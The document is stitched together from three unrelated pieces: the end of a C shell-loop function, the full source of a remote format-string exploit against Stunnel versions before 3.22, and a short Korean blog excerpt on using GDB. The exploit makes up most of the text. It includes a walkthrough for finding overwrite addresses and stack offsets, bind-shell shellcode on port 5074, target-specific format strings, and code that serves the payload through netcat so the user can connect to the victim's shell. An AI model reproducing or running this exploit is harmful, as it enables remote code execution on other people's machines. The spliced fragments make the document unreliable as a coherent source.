        if ((writelen = write(fd, readbuf, readlen)) == -1)

        { fprintf(stderr, "write() failed with error code %i ('%s')\n", errno, strerror(errno));

          exit(-1);

        }

        FD_ZERO(&readfds);

        continue;

      }

      if (FD_ISSET(fd, &readfds))

      { if ((readlen = read(fd, readbuf, sizeof (readbuf))) == -1)

        { fprintf(stderr, "shell loop aborted because of error code %i ('%s')\n", errno, strerror(errno));

          break;

        }

        write(fileno(stderr), readbuf, readlen);

        FD_ZERO(&readfds);   

        continue;

      }

    }

  }

  printf("user break.\n");

  signal(SIGINT, SIG_DFL);

  return 0;

}

/*

* Stunnel < 3.22 remote exploit

* by ^sq/w00nf - deltha [at] analog.ro

* Contact: deltha@analog.ro

* Webpage: http://www.w00nf.org/^sq/

*

* ey ./w00nf-stunnel contribs - kewlthanx :

* nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and not @ the end: bajkero

*

* You also need netcat and format strings build utility (from my webpage)

* Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c

*

* . . .. ......................................... ...

* . ____ ____ _____ :.:.:

* : _ __/ __ \/ __ \____ / __/ :..

* :.. | | /| / / / / / / / / __ \/ /_ :

* ..:.. | |/ |/ / /_/ / /_/ / / / / __/ :

* :.: :.. |__/|__/\____/\____/_/ /_/_/ .

* : : :..

* :.: :............................................... .. . . 

* T . E . A . M 

* 

* POC - Tested remotely on linux 

* Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL 

* Visit http://www.stunnel.org for details

*

* I didn't add a search function or bruteforce attack because the vulnerability does'nt allow you

* to grab the remote stack.

*

* Description of this exploit:

* This exploit puts a payload on a specified port. When a remote user connects to your machine 

* using stunnel on the specified port, the exploit executes this payload and binds a shell to the

* remote users machine on port 5074.

* 

* Summary: 

* Malicious servers could potentially run code as the owner of an Stunnel process when using 

* Stunnel's protocol negotiation feature in client mode. 

*

* Description of vulnerability: 

* Stunnel is an SSL wrapper able to act as an SSL client or server, 

* enabling non-SSL aware applications and servers to utilize SSL encryption. 

* In addition, Stunnel has the ability to perform as simple SSL encryption/decryption 

* engine. Stunnel can negotiate SSL with several other protocols, such as 

* SMTP's "STARTTLS" option, using the '-n protocolname' flag. Doing so 

* requires that Stunnel watches the initial protocol handshake before 

* beginning the SSL session. 

* There are format string bugs in each of the smtp, pop, and nntp 

* client negotiations as supplied with Stunnel versions 3.3 up to 3.21c. 

*

* No exploit is currently known, but the bugs are most likely exploitable. 

* 

* Impact: 

* If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options 

* in client mode ('-c'), a malicous server could abuse the format 

* string bug to run arbitrary code as the owner of the Stunnel 

* process. The user that runs Stunnel depends on how you start 

* Stunnel. It may or may not be root -- you will need to check 

* how you invoke Stunnel to be sure. 

* There is no vulnerability unless you are invoking Stunnel with 

* the '-n smtp', '-n pop', or '-n nntp' options in client mode. 

* There are no format string bugs in Stunnel when it is running as an SSL 

* server. 

*

* Mitigating factors: 

* If you start Stunnel as root but have it change userid to some other 

* user using the '-s username' option, the Stunnel process will be 

* running as 'username' instead of root when this bug is triggered. 

* If this is the case, the attacker can still trick your Stunnel process 

* into running code as 'username', but not as root. 

* Where possible, we suggest running Stunnel as a non-root user, either 

* using the '-s' option or starting it as a non-privileged user. 

*

* Triggering this vulnerability - example for kidz:

* Obtain a shell account on to-be-hacked's server and perform the following commands:

* sq@cal013102: whereis stunnel

* stunnel: /usr/sbin/stunnel

* change directory to where is stunnel

* Obtain vsnprintf's R_386_JUMP_SLOT:

* sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep printf

* 08053470 R_386_JUMP_SLOT fprintf

* ---->080534a8 R_386_JUMP_SLOT vsnprintf

* 080535a4 R_386_JUMP_SLOT snprintf

* 08053620 R_386_JUMP_SLOT sprintf

* open 2 terminals

* in the first terminal make netcat connect to a port (eg 252525)

* sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l 

* in the second terminal (remote) simulate attack 

* ./stunnel -c -n smtp -r localhost:252525

* in the first terminal with nc insert a specially crafted string to grep eatstack value

* AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|

* in the second terminal (remote) it will return the stack values and see at which position 

* 41414141 and 424242 appeared

* AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4|

* 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c|

* 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10

* try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return AAAABBBB4141414142424242

* put the address obtained with objdump in hex little endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08

* (a8+2=aa) and generate the decimal value of format string after you got the middle of nops value on stack 0xbffff89b

* with build, a program attached to this exploit.

* ./build 080534a8 0xbffff89b 9

* adr : 134558888 (80534a8)

* val : -1073743717 (bffff89b)

* valh: 49151 (bfff)

* vall: 63643 (f89b)

* [ª¨%.49143x%9$hn%.14492x%10$hn] (35)

* ª¨%.49143x%9$hn%.14492x%10$hn

* The resulting string is %.49143x%9$hn%.14492x%10$hn -> 

* "'`%.32759u%9\$hn%.32197u%10\$hn replace eatstack 10 with 9 otherwise it won't work

* eg "'`%.32759u%10\$hn%.32197u%9\$hn

* Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x

* Bind the payload to a port ./netcat -p 252525 -l <x

* Simulate the payload attack ./stunnel -c -n smtp -r localhost:252525

* Add your own crafted format in the exploit:

* char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf

* char fmtYOUROWN[]=""; R_386_JUMP_SLOT vsnprintf 

* Simulate the payload attack with this exploit ./w00nf-stunnel -t 6 -p 252525 t6 would be your custom payload

* after you added your string in the exploit.

* If stunnel was compiled with gdb support and you set ulimit -c 9024 or whatever to coredump on your terminal

* then stunnel will coredump if you didn't guess the exact stackvalue in the middle of nops.

* If stunnel wasn't compiled with gdb support then download it from the stunnel website

* and compile with gdb support. 

* Once you have downloaded it run './configure edit Makefile' , and where you see 'CFLAGS' add '-g -ggdb3'

* eg. 'cat Makefile |grep CFLAGS'

* CFLAGS=-g -ggdb3 -O2 -Wall -I/usr/local/ssl/include -DVERSION=\"3.20\" -DHAVE_OPENSSL=1 -Dssldir=\"/usr/local/ssl\"

* -DPEM_DIR=\"\" -DRANDOM_FILE=\"/dev/urandom\" -DSSLLIB_CS=0 -DHOST=\"i586-pc-linux-gnu\" -DHAVE_LIBDL=1 

* DHAVE_LIBPTHREAD=1 -DHAVE_LIBUTIL=1 -DHAVE_LIBWRAP=1 etcetc

* Open core in gdb sq@cal013102:~/stunnel-3.20$gdb ./stunnel core.2411

* x/10i $esp and press enter a couple of times till you find 'nop nop nop nop nop nop'.

* Get the stack address in the middle of nops, 0xbffff89b is my address

* and build (9 is eatstack) again with the ./build utility

* Rebuild and repeat.

* ./build 080534a8 0xbffff89b 9

* Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x

* ./w00nf-stunnel -t 6 -p 252525 t6 is your custom payload and it will bind a shell on 5074 :)

* If it worked then add your own crafted format in the exploit

* char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf

* char fmtYOUROWN[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; R_386_JUMP_SLOT vsnprintf 

*

*/

#include <fcntl.h>

#include <netdb.h>

#include <sys/stat.h>

#include <sys/types.h>

#include <unistd.h>

#include <stdio.h>

#include <string.h>

#include <getopt.h>

#include <stdlib.h>

#include <memory.h>

#include <errno.h>

#include <syslog.h>

int MAX;

char linuxshellcode[] =

/* <priv8security>: bind@5074 */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90" /* nop */

"\x90\x90\x90\x90\x90\x90" /* nop */

"\x31\xc0" /* xor %eax,%eax */

"\x50" /* push %eax */

"\x40" /* inc %eax */

"\x89\xc3" /* mov %eax,%ebx */

"\x50" /* push %eax */

"\x40" /* inc %eax */

"\x50" /* push %eax */

"\x89\xe1" /* mov %esp,%ecx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x31\xd2" /* xor %edx,%edx */

"\x52" /* push %edx */

"\x66\x68\x13\xd2" /* pushw $0xd213 */

"\x43" /* inc %ebx */

"\x66\x53" /* push %bx */

"\x89\xe1" /* mov %esp,%ecx */

"\x6a\x10" /* push $0x10 */

"\x51" /* push %ecx */

"\x50" /* push %eax */

"\x89\xe1" /* mov %esp,%ecx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x40" /* inc %eax */

"\x89\x44\x24\x04" /* mov %eax,0x4(%esp,1) */

"\x43" /* inc %ebx */

"\x43" /* inc %ebx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x83\xc4\x0c" /* add $0xc,%esp */

"\x52" /* push %edx */

"\x52" /* push %edx */

"\x43" /* inc %ebx */

"\xb0\x66" /* mov $0x66,%al */

"\xcd\x80" /* int $0x80 */

"\x93" /* xchg %eax,%ebx */

"\x89\xd1" /* mov %edx,%ecx */

"\xb0\x3f" /* mov $0x3f,%al */

"\xcd\x80" /* int $0x80 */

"\x41" /* inc %ecx */

"\x80\xf9\x03" /* cmp $0x3,%cl */

"\x75\xf6" /* jne 80a035d <priv8security+0x3d> */

"\x52" /* push %edx */

"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */

"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */

"\x89\xe3" /* mov %esp,%ebx */

"\x52" /* push %edx */

"\x53" /* push %ebx */

"\x89\xe1" /* mov %esp,%ecx */

"\xb0\x0b" /* mov $0xb,%al */

"\xcd\x80"; /* int $0x80 */

char fmtRH72[]="\x50\x71\x05\x08\x52\x71\x05\x08%.49143x%4\$hn%.12881x%3\$hn"; /* 08057150 R_386_JUMP_SLOT vsnprintf */

char fmtRH73[]="\xe8\x69\x05\x08\xea\x69\x05\x08%.49143x%4\$hn%.12982x%3\$hn"; /* 080569e8 R_386_JUMP_SLOT vsnprintf */

char fmtRH80[]="\x28\x69\x05\x08\x2a\x69\x05\x08%.49143x%4\$hn%.12815x%3\$hn"; /* 08056928 R_386_JUMP_SLOT vsprintf */

char fmtMDK90[]="\xf8\x23\x05\x08\xfa\x23\x05\x08%.49143x%4\$hn%.13321x%3\$hn"; /* 080523f8 R_386_JUMP_SLOT vsnprintf */

char fmtSLACK81[]="\xdc\x69\x05\x08\xde\x69\x05\x08%.49143x%10\$hn%.12082x%9\$hn"; /* 080569dc R_386_JUMP_SLOT vsnprintf */

char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; /* 080534a8 R_386_JUMP_SLOT vsnprintf */

char fmtYOUROWN[]=""; /* R_386_JUMP_SLOT vsnprintf */

char c;

struct os {

int num;

char *ost;

char *shellcode;

char *format;

int flag;

};

struct os plat[] =

{

{

0,"Red Hat Linux release 7.2 stunnel-3.20.tar.gz",

linuxshellcode,fmtRH72,11

},

{

1,"Red Hat Linux release 7.3 stunnel-3.20.tar.gz",

linuxshellcode,fmtRH73,11

},

{

2,"Red Hat Linux release 8.0 stunnel-3.20.tar.gz",

linuxshellcode,fmtRH80,11

},

{

3,"Mandrake Linux release 9.0 stunnel-3.20.tar.gz",

linuxshellcode,fmtMDK90,11

},

{

4,"Slackware Linux release 8.1 stunnel-3.20.tar.gz",

linuxshellcode,fmtSLACK81,5

},

{

5,"Debian GNU release 3.0 stunnel-3.20.tar.bz2",

linuxshellcode,fmtDEBIAN30,5

},

{

6,"Your custom distro stunnel-3.20.tar.bz2",

linuxshellcode,fmtYOUROWN,5

}

};

void usage(char *argument);

int main(argc,argv)

int argc;

char *argv[];

{

int type=0;

int flag=plat[type].flag;

extern char *optarg;

int cnt;

char newstring[300];

int port = 994;

const char* sploitdata_filename = "sploitdata.spl"; 

static int fd[2];

static pid_t childpid;

static char str_port[6];

void write_sploit_data (char* entry)

{

int fd = open (sploitdata_filename, O_WRONLY | O_CREAT | O_APPEND, 0660);

write (fd, entry, strlen (entry));

write (fd, "\n", 1);

fsync (fd);

close (fd);

}

if(argc == 1) 

usage(argv[0]);

if(argc == 2) 

usage(argv[0]);

if(argc == 3) 

usage(argv[0]);

while ((c = getopt(argc, argv, "h:p:t:v")) > 0 ){

switch (c) {

case 't':

type = atoi(optarg);

if(type>6) /* 0,1,2,3,4,5,6 */

{

(void)usage(argv[0]);

}

break;

case 'p':

port = atoi(optarg);

break;

case 'h':

usage(argv[0]);

case '?':

case ':':

exit(-1);

}

}

MAX=strlen(plat[type].format)+strlen(plat[type].shellcode);

fprintf(stdout,"Remote exploit for STUNNEL <3.22\nby ^sq/w00nf - deltha [at] analog.ro\n");

fprintf(stdout,"[*] target: %s\n",plat[type].ost);

fprintf(stdout,"[*] maxlenght: %d\n", MAX);

unlink (sploitdata_filename);

strcpy(newstring, plat[type].format);

strcat(newstring, plat[type].shellcode);

write_sploit_data(newstring);

sprintf((char *) &str_port, "%d", port);

printf("[*] host: localhost\n");

printf("[*] port: %s\n", str_port); 

printf("[*] waiting: jackass should connect to our port\n");

printf("[*] next: after he connects press ctrl-c\n"); 

printf("[*] next: you should try to connect to his port 5074 - nc 1.2.3.4 5074\n"); 

pipe(fd);

if (( childpid=fork())==0) { /* cat is the child */

dup2(fd[1],STDOUT_FILENO);

close(fd[0]);

close(fd[1]);

execl("/bin/cat","cat",sploitdata_filename,NULL);

perror("The exec of cat failed");

} else { /* netcat is the parent */

dup2(fd[0], STDIN_FILENO);

close(fd[0]);

close(fd[1]);

execl("/usr/bin/nc", "nc", "-n", "-l", "-p", str_port, NULL);

perror("the exec of nc failed");

}

printf("[*] next: now you should try to connect to his port 5074\n"); 

exit(0);

}

void usage(char *argument)

{

fprintf(stdout,"Usage: %s -options arguments\n",argument);

fprintf(stdout,"Remote exploit for STUNNEL <3.22\n"

"by ^sq/w00nf - deltha [at] analog.ro\nUsage: %s [-p <port> -t <targettype>]\n"

"\t-p <port> - Local binded port where the remote stunnel connects\n"

"\t-t <target> - Target type number\n", argument);

fprintf(stdout,"\t-Target Type Number List-\n");

fprintf(stdout," {0} Red Hat Linux release 7.2 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {1} Red Hat Linux release 7.3 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {2} Red Hat Linux release 8.0 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {3} Mandrake Linux release 9.0 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {4} Slackware Linux release 8.1 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {5} Debian GNU release 3.0 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {6} Your custom distro "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," Example1: %s -t 1 -p 252525\n",argument);

exit(0);

}

[출처 ]  http://blog.naver.com/endfirst?Redirect=Log&logNo=20003426603

링크를 다오려다가 복사해서 옵니다. 

GDB 사용하기

1.    GDB

GDB같은 디버거의 목적은 다른 프로그램 수행 중에 그 프로그램 ‘내부에서’ 무슨 일이 일어나고 있는지 보여주거나 프로그램이 잘못 실행되었을 때 무슨 일이 일어나고 있는지 보여주는것이다. GDB는C, C++, Modula-2로 짠 프로그램을 디버그 할 수 있다.

쉘에서 gdb로 GDB를 시작하면 quit로 종료명령을 주기전까지는 터미널로부터 명령라인을 읽어 들인다. help명령을 사용하여 gdb내부에서 도움말을 볼 수 있다.

디버깅을 하기 위해서는 –g옵션을 주고 컴파일/링크 해야 한다. 만약 링크가 libg.a를 찾을수 없다고 하면서 실패하게 되면, /usr/lib/ligb.a를 갖고 있지 않기 때문이다. 그 파일은 특별한 라이브러리로서 디버깅 가능 C라이브러리이다. libc 패키지에 포함되어 있거나 또는 libc소스 코드를 받아서 컴파일 하면 생긴다. /usr/lib/libc.a를 /usr/lib/libg.a로 링크 시켜도 된다.